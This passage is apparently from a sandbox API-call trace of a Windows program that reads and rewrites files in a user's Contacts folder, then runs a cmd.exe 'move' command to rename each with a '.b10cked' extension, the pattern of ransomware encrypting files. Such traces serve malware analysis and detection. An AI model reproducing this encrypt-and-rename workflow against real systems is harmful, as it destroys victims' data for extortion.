lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0219.246] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.246] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x4e9 [0219.246] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.246] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.246] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x273, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x273, lpOverlapped=0x0) returned 1 [0219.246] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.246] WriteFile (in: hFile=0x1b4, lpBuffer=0x1279be8*, nNumberOfBytesToWrite=0x273, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1279be8*, lpNumberOfBytesWritten=0x12ec1c*=0x273, lpOverlapped=0x0) returned 1 [0219.246] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-627, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x276 [0219.246] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x273, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x273, lpOverlapped=0x0) returned 1 [0219.246] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-627, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x276 [0219.246] WriteFile (in: hFile=0x1b4, lpBuffer=0x1279be8*, nNumberOfBytesToWrite=0x273, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1279be8*, lpNumberOfBytesWritten=0x12ec1c*=0x273, lpOverlapped=0x0) returned 1 [0219.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mneuc uhnfghgg.contact", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0219.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mneuc uhnfghgg.contact", cchWideChar=22, lpMultiByteStr=0x13286a4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mneuc uhnfghgg.contact", lpUsedDefaultChar=0x0) returned 22 [0219.250] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x4e9 [0219.250] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.250] CloseHandle (hObject=0x1b4) returned 1 [0219.251] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON") returned 0x26 [0219.251] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\") returned 0x1a [0219.251] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xf40, dwThreadId=0xe44)) returned 1 [0219.252] CloseHandle (hObject=0x120) returned 1 [0219.252] CloseHandle (hObject=0x1b4) returned 1 [0219.253] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.253] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.253] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 2 [0219.253] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.253] ReleaseMutex (hMutex=0xf8) returned 1 [0219.253] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.253] ReleaseMutex (hMutex=0xf8) returned 1 [0219.253] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.253] ReleaseMutex (hMutex=0xf8) returned 1 [0219.253] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.253] ReleaseMutex (hMutex=0xf8) returned 1 [0219.253] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ofhbnh edferrr.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0219.253] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.253] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f1 [0219.253] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.253] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27604241393) returned 1 [0219.253] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.253] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f1 [0219.253] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.253] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.253] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f1 [0219.253] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.253] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x4f1 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f1 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f1 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f1 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f1 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f1 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f1 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.254] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x9 [0219.254] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0219.256] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0219.256] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.256] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x4f1 [0219.256] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.256] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0219.256] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.256] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x4f1 [0219.256] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.256] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.256] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x277, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x277, lpOverlapped=0x0) returned 1 [0219.256] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.256] WriteFile (in: hFile=0x1b4, lpBuffer=0x1279be8*, nNumberOfBytesToWrite=0x277, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1279be8*, lpNumberOfBytesWritten=0x12ec1c*=0x277, lpOverlapped=0x0) returned 1 [0219.256] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-631, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x27a [0219.256] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x277, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x277, lpOverlapped=0x0) returned 1 [0219.256] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-631, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x27a [0219.256] WriteFile (in: hFile=0x1b4, lpBuffer=0x1279be8*, nNumberOfBytesToWrite=0x277, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1279be8*, lpNumberOfBytesWritten=0x12ec1c*=0x277, lpOverlapped=0x0) returned 1 [0219.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ofhbnh edferrr.contact", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0219.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ofhbnh edferrr.contact", cchWideChar=22, lpMultiByteStr=0x13286a4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ofhbnh edferrr.contact", lpUsedDefaultChar=0x0) returned 22 [0219.260] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x4f1 [0219.260] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.260] CloseHandle (hObject=0x1b4) returned 1 [0219.261] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON") returned 0x26 [0219.261] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\") returned 0x1a [0219.262] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x694, dwThreadId=0xd24)) returned 1 [0219.291] CloseHandle (hObject=0x120) returned 1 [0219.291] CloseHandle (hObject=0x1b4) returned 1 [0219.291] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.291] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.291] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 2 [0219.291] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.291] ReleaseMutex (hMutex=0xf8) returned 1 [0219.291] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.291] ReleaseMutex (hMutex=0xf8) returned 1 [0219.291] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.291] ReleaseMutex (hMutex=0xf8) returned 1 [0219.291] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.291] ReleaseMutex (hMutex=0xf8) returned 1 [0219.292] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact" (normalized: "c:\\users\\eebsym5\\contacts\\uosjfl sidvllie.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0219.311] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.311] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f3 [0219.311] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.311] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27610067973) returned 1 [0219.311] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f3 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f3 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x4f3 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f3 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f3 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f3 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f3 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.312] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f3 [0219.313] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.313] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.313] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4f3 [0219.313] SetFilePointer (in: 